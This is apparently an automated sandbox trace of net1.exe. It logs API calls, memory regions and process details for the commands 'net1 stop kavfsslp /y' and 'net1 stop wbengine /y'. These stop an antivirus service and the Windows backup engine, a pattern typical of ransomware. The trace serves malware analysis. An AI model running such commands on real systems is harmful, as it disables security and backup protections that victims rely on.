[0124.872] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0124.872] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0124.872] _wcsicmp (_String1="file", _String2="stop") returned -13 [0124.872] _wcsicmp (_String1="files", _String2="stop") returned -13 [0124.872] _wcsicmp (_String1="group", _String2="stop") returned -12 [0124.872] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0124.872] _wcsicmp (_String1="help", _String2="stop") returned -11 [0124.872] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0124.873] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0124.873] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0124.873] _wcsicmp (_String1="session", _String2="stop") returned -15 [0124.873] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0124.873] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0124.873] _wcsicmp (_String1="share", _String2="stop") returned -12 [0124.873] _wcsicmp (_String1="start", _String2="stop") returned -14 [0124.873] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0124.873] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0124.873] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0124.873] _wcsicmp (_String1="accounts", _String2="kavfsslp") returned -10 [0124.873] _wcsicmp (_String1="computer", _String2="kavfsslp") returned -8 [0124.873] _wcsicmp (_String1="config", _String2="kavfsslp") returned -8 [0124.873] _wcsicmp (_String1="continue", _String2="kavfsslp") returned -8 [0124.873] _wcsicmp (_String1="cont", _String2="kavfsslp") returned -8 [0124.873] _wcsicmp (_String1="file", _String2="kavfsslp") returned -5 [0124.873] _wcsicmp (_String1="files", _String2="kavfsslp") returned -5 [0124.873] _wcsicmp (_String1="group", _String2="kavfsslp") returned -4 [0124.873] _wcsicmp (_String1="groups", _String2="kavfsslp") returned -4 [0124.873] _wcsicmp (_String1="help", _String2="kavfsslp") returned -3 [0124.873] _wcsicmp (_String1="helpmsg", _String2="kavfsslp") returned -3 [0124.873] _wcsicmp (_String1="localgroup", _String2="kavfsslp") returned 1 [0124.873] _wcsicmp (_String1="pause", _String2="kavfsslp") returned 5 [0124.873] _wcsicmp (_String1="session", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="sessions", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="sess", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="share", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="start", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="stats", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="statistics", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="stop", _String2="kavfsslp") returned 8 [0124.873] _wcsicmp (_String1="time", _String2="kavfsslp") returned 9 [0124.873] _wcsicmp (_String1="user", _String2="kavfsslp") returned 10 [0124.873] _wcsicmp (_String1="users", _String2="kavfsslp") returned 10 [0124.873] _wcsicmp (_String1="msg", _String2="kavfsslp") returned 2 [0124.873] _wcsicmp (_String1="messenger", _String2="kavfsslp") returned 2 [0124.873] _wcsicmp (_String1="receiver", _String2="kavfsslp") returned 7 [0124.873] _wcsicmp (_String1="rcv", _String2="kavfsslp") returned 7 [0124.873] _wcsicmp (_String1="netpopup", _String2="kavfsslp") returned 3 [0124.873] _wcsicmp (_String1="redirector", _String2="kavfsslp") returned 7 [0124.873] _wcsicmp (_String1="redir", _String2="kavfsslp") returned 7 [0124.873] _wcsicmp (_String1="rdr", _String2="kavfsslp") returned 7 [0124.873] _wcsicmp (_String1="workstation", _String2="kavfsslp") returned 12 [0124.874] _wcsicmp (_String1="work", _String2="kavfsslp") returned 12 [0124.874] _wcsicmp (_String1="wksta", _String2="kavfsslp") returned 12 [0124.874] _wcsicmp (_String1="prdr", _String2="kavfsslp") returned 5 [0124.874] _wcsicmp (_String1="devrdr", _String2="kavfsslp") returned -7 [0124.874] _wcsicmp (_String1="lanmanworkstation", _String2="kavfsslp") returned 1 [0124.874] _wcsicmp (_String1="server", _String2="kavfsslp") returned 8 [0124.874] _wcsicmp (_String1="svr", _String2="kavfsslp") returned 8 [0124.874] _wcsicmp (_String1="srv", _String2="kavfsslp") returned 8 [0124.874] _wcsicmp (_String1="lanmanserver", _String2="kavfsslp") returned 1 [0124.874] _wcsicmp (_String1="alerter", _String2="kavfsslp") returned -10 [0124.874] _wcsicmp (_String1="netlogon", _String2="kavfsslp") returned 3 [0124.874] _wcsupr (in: _String="kavfsslp" | out: _String="KAVFSSLP") returned="KAVFSSLP" [0124.874] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36cdf0 [0124.941] GetServiceKeyNameW (in: hSCManager=0x36cdf0, lpDisplayName="KAVFSSLP", lpServiceName=0xffb35750, lpcchBuffer=0x1af968 | out: lpServiceName="", lpcchBuffer=0x1af968) returned 0 [0124.942] _wcsicmp (_String1="msg", _String2="KAVFSSLP") returned 2 [0124.942] _wcsicmp (_String1="messenger", _String2="KAVFSSLP") returned 2 [0124.942] _wcsicmp (_String1="receiver", _String2="KAVFSSLP") returned 7 [0124.942] _wcsicmp (_String1="rcv", _String2="KAVFSSLP") returned 7 [0124.942] _wcsicmp (_String1="redirector", _String2="KAVFSSLP") returned 7 [0124.942] _wcsicmp (_String1="redir", _String2="KAVFSSLP") returned 7 [0124.942] _wcsicmp (_String1="rdr", _String2="KAVFSSLP") returned 7 [0124.942] _wcsicmp (_String1="workstation", _String2="KAVFSSLP") returned 12 [0124.942] _wcsicmp (_String1="work", _String2="KAVFSSLP") returned 12 [0124.942] _wcsicmp (_String1="wksta", _String2="KAVFSSLP") returned 12 [0124.942] _wcsicmp (_String1="prdr", _String2="KAVFSSLP") returned 5 [0124.942] _wcsicmp (_String1="devrdr", _String2="KAVFSSLP") returned -7 [0124.942] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSSLP") returned 1 [0124.942] _wcsicmp (_String1="server", _String2="KAVFSSLP") returned 8 [0124.942] _wcsicmp (_String1="svr", _String2="KAVFSSLP") returned 8 [0124.942] _wcsicmp (_String1="srv", _String2="KAVFSSLP") returned 8 [0124.942] _wcsicmp (_String1="lanmanserver", _String2="KAVFSSLP") returned 1 [0124.942] _wcsicmp (_String1="alerter", _String2="KAVFSSLP") returned -10 [0124.942] _wcsicmp (_String1="netlogon", _String2="KAVFSSLP") returned 3 [0124.942] NetServiceControl (in: servername=0x0, service="KAVFSSLP", opcode=0x0, arg=0x0, bufptr=0x1af970 | out: bufptr=0x1af970) returned 0x889 [0124.943] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.943] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0124.944] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0124.946] GetFileType (hFile=0xb) returned 0x2 [0124.946] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af838 | out: lpMode=0x1af838) returned 1 [0124.946] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af830, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1af830*=0x1e) returned 1 [0124.946] GetFileType (hFile=0xb) returned 0x2 [0124.946] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af838 | out: lpMode=0x1af838) returned 1 [0124.947] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af830, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1af830*=0x2) returned 1 [0124.947] _ultow (in: _Dest=0x889, _Radix=1767584 | out: _Dest=0x889) returned="2185" [0124.947] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0124.947] GetFileType (hFile=0xb) returned 0x2 [0124.948] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af838 | out: lpMode=0x1af838) returned 1 [0124.948] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af830, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1af830*=0x34) returned 1 [0124.948] GetFileType (hFile=0xb) returned 0x2 [0124.948] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af838 | out: lpMode=0x1af838) returned 1 [0124.948] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af830, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1af830*=0x2) returned 1 [0124.949] NetApiBufferFree (Buffer=0x364d40) returned 0x0 [0124.949] NetApiBufferFree (Buffer=0x36c0e0) returned 0x0 [0124.949] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop kavfsslp /y" [0124.949] exit (_Code=2) Process: id = "413" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x1f2e9000" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "401" os_parent_pid = "0x12b0" cmd_line = "C:\\Windows\\system32\\net1 stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14271 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14272 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14273 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14274 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 14275 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14276 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14277 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14278 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14279 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14280 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14281 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 14282 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14283 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14284 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 14285 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14286 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14287 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14288 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14289 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14429 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14430 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 14431 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 14432 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14433 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14434 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14435 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14436 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14437 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14438 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14439 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14440 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14441 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14442 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14443 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14444 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14445 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14446 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14447 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14468 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 976 os_tid = 0xed8 [0124.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfdd0 | out: lpSystemTimeAsFileTime=0x1cfdd0*(dwLowDateTime=0xff72eb70, dwHighDateTime=0x1d48689)) [0124.856] GetCurrentProcessId () returned 0xfbc [0124.856] GetCurrentThreadId () returned 0xed8 [0124.856] GetTickCount () returned 0x28cb4 [0124.856] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfdd8 | out: lpPerformanceCount=0x1cfdd8*=1817177500000) returned 1 [0124.857] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0124.857] __set_app_type (_Type=0x1) [0124.857] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0124.857] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0124.857] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.858] GetConsoleOutputCP () returned 0x1b5 [0124.865] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0124.865] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.869] sprintf_s (in: _DstBuf=0x1cfd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0124.869] setlocale (category=0, locale=".437") returned="English_United States.437" [0124.877] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0124.877] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0124.877] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0124.878] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cfb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0124.878] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0124.878] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfd68 | out: Buffer=0x1cfd68*=0x64d40) returned 0x0 [0124.878] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfd68 | out: Buffer=0x1cfd68*=0x6c0e0) returned 0x0 [0124.878] _fileno (_File=0x7fefdba2a80) returned 0 [0124.878] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0124.878] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0124.878] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0124.878] _wcsicmp (_String1="config", _String2="stop") returned -16 [0124.878] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0124.878] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0124.878] _wcsicmp (_String1="file", _String2="stop") returned -13 [0124.878] _wcsicmp (_String1="files", _String2="stop") returned -13 [0124.878] _wcsicmp (_String1="group", _String2="stop") returned -12 [0124.878] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0124.878] _wcsicmp (_String1="help", _String2="stop") returned -11 [0124.878] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0124.878] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0124.878] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0124.878] _wcsicmp (_String1="session", _String2="stop") returned -15 [0124.878] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0124.878] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0124.878] _wcsicmp (_String1="share", _String2="stop") returned -12 [0124.878] _wcsicmp (_String1="start", _String2="stop") returned -14 [0124.878] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0124.878] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0124.878] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0124.878] _wcsicmp (_String1="accounts", _String2="wbengine") returned -22 [0124.879] _wcsicmp (_String1="computer", _String2="wbengine") returned -20 [0124.879] _wcsicmp (_String1="config", _String2="wbengine") returned -20 [0124.879] _wcsicmp (_String1="continue", _String2="wbengine") returned -20 [0124.879] _wcsicmp (_String1="cont", _String2="wbengine") returned -20 [0124.879] _wcsicmp (_String1="file", _String2="wbengine") returned -17 [0124.879] _wcsicmp (_String1="files", _String2="wbengine") returned -17 [0124.879] _wcsicmp (_String1="group", _String2="wbengine") returned -16 [0124.879] _wcsicmp (_String1="groups", _String2="wbengine") returned -16 [0124.879] _wcsicmp (_String1="help", _String2="wbengine") returned -15 [0124.879] _wcsicmp (_String1="helpmsg", _String2="wbengine") returned -15 [0124.879] _wcsicmp (_String1="localgroup", _String2="wbengine") returned -11 [0124.879] _wcsicmp (_String1="pause", _String2="wbengine") returned -7 [0124.879] _wcsicmp (_String1="session", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="sessions", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="sess", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="share", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="start", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="stats", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="statistics", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="stop", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="time", _String2="wbengine") returned -3 [0124.879] _wcsicmp (_String1="user", _String2="wbengine") returned -2 [0124.879] _wcsicmp (_String1="users", _String2="wbengine") returned -2 [0124.879] _wcsicmp (_String1="msg", _String2="wbengine") returned -10 [0124.879] _wcsicmp (_String1="messenger", _String2="wbengine") returned -10 [0124.879] _wcsicmp (_String1="receiver", _String2="wbengine") returned -5 [0124.879] _wcsicmp (_String1="rcv", _String2="wbengine") returned -5 [0124.879] _wcsicmp (_String1="netpopup", _String2="wbengine") returned -9 [0124.879] _wcsicmp (_String1="redirector", _String2="wbengine") returned -5 [0124.879] _wcsicmp (_String1="redir", _String2="wbengine") returned -5 [0124.879] _wcsicmp (_String1="rdr", _String2="wbengine") returned -5 [0124.879] _wcsicmp (_String1="workstation", _String2="wbengine") returned 13 [0124.879] _wcsicmp (_String1="work", _String2="wbengine") returned 13 [0124.879] _wcsicmp (_String1="wksta", _String2="wbengine") returned 9 [0124.879] _wcsicmp (_String1="prdr", _String2="wbengine") returned -7 [0124.879] _wcsicmp (_String1="devrdr", _String2="wbengine") returned -19 [0124.879] _wcsicmp (_String1="lanmanworkstation", _String2="wbengine") returned -11 [0124.879] _wcsicmp (_String1="server", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="svr", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="srv", _String2="wbengine") returned -4 [0124.879] _wcsicmp (_String1="lanmanserver", _String2="wbengine") returned -11 [0124.879] _wcsicmp (_String1="alerter", _String2="wbengine") returned -22 [0124.879] _wcsicmp (_String1="netlogon", _String2="wbengine") returned -9 [0124.880] _wcsupr (in: _String="wbengine" | out: _String="WBENGINE") returned="WBENGINE" [0124.880] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6cdf0 [0124.889] GetServiceKeyNameW (in: hSCManager=0x6cdf0, lpDisplayName="WBENGINE", lpServiceName=0xffb35750, lpcchBuffer=0x1cfc88 | out: lpServiceName="", lpcchBuffer=0x1cfc88) returned 0 [0124.891] _wcsicmp (_String1="msg", _String2="WBENGINE") returned -10 [0124.891] _wcsicmp (_String1="messenger", _String2="WBENGINE") returned -10 [0124.891] _wcsicmp (_String1="receiver", _String2="WBENGINE") returned -5 [0124.891] _wcsicmp (_String1="rcv", _String2="WBENGINE") returned -5 [0124.891] _wcsicmp (_String1="redirector", _String2="WBENGINE") returned -5 [0124.891] _wcsicmp (_String1="redir", _String2="WBENGINE") returned -5 [0124.891] _wcsicmp (_String1="rdr", _String2="WBENGINE") returned -5 [0124.891] _wcsicmp (_String1="workstation", _String2="WBENGINE") returned 13 [0124.891] _wcsicmp (_String1="work", _String2="WBENGINE") returned 13 [0124.891] _wcsicmp (_String1="wksta", _String2="WBENGINE") returned 9 [0124.891] _wcsicmp (_String1="prdr", _String2="WBENGINE") returned -7 [0124.891] _wcsicmp (_String1="devrdr", _String2="WBENGINE") returned -19 [0124.891] _wcsicmp (_String1="lanmanworkstation", _String2="WBENGINE") returned -11 [0124.891] _wcsicmp (_String1="server", _String2="WBENGINE") returned -4 [0124.891] _wcsicmp (_String1="svr", _String2="WBENGINE") returned -4 [0124.891] _wcsicmp (_String1="srv", _String2="WBENGINE") returned -4 [0124.891] _wcsicmp (_String1="lanmanserver", _String2="WBENGINE") returned -11 [0124.891] _wcsicmp (_String1="alerter", _String2="WBENGINE") returned -22 [0124.891] _wcsicmp (_String1="netlogon", _String2="WBENGINE") returned -9 [0124.891] NetServiceControl (in: servername=0x0, service="WBENGINE", opcode=0x0, arg=0x0, bufptr=0x1cfc90 | out: bufptr=0x1cfc90) returned 0x0 [0124.896] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1cfc48 | out: Buffer=0x1cfc48*=0x70c70) returned 0x0 [0124.896] OpenServiceW (hSCManager=0x6cdf0, lpServiceName="WBENGINE", dwDesiredAccess=0xc) returned 0x6ce50 [0124.896] QueryServiceStatus (in: hService=0x6ce50, lpServiceStatus=0x1cfbf0 | out: lpServiceStatus=0x1cfbf0*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0124.896] GetServiceDisplayNameW (in: hSCManager=0x6cdf0, lpServiceName="WBENGINE", lpDisplayName=0xffb35350, lpcchBuffer=0x1cfbc8 | out: lpDisplayName="Block Level Backup Engine Service", lpcchBuffer=0x1cfbc8) returned 1 [0124.897] NetApiBufferFree (Buffer=0x70c70) returned 0x0 [0124.897] CloseServiceHandle (hSCObject=0x6ce50) returned 1 [0124.897] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.897] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0124.898] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The Block Level Backup Engine Service service is not started.\r\n") returned 0x3f [0124.899] GetFileType (hFile=0xb) returned 0x2 [0124.953] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfae8 | out: lpMode=0x1cfae8) returned 1 [0124.953] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x1cfae0, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1cfae0*=0x3f) returned 1 [0124.953] GetFileType (hFile=0xb) returned 0x2 [0124.954] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfae8 | out: lpMode=0x1cfae8) returned 1 [0124.954] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfae0, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1cfae0*=0x2) returned 1 [0124.954] _ultow (in: _Dest=0xdc1, _Radix=1899344 | 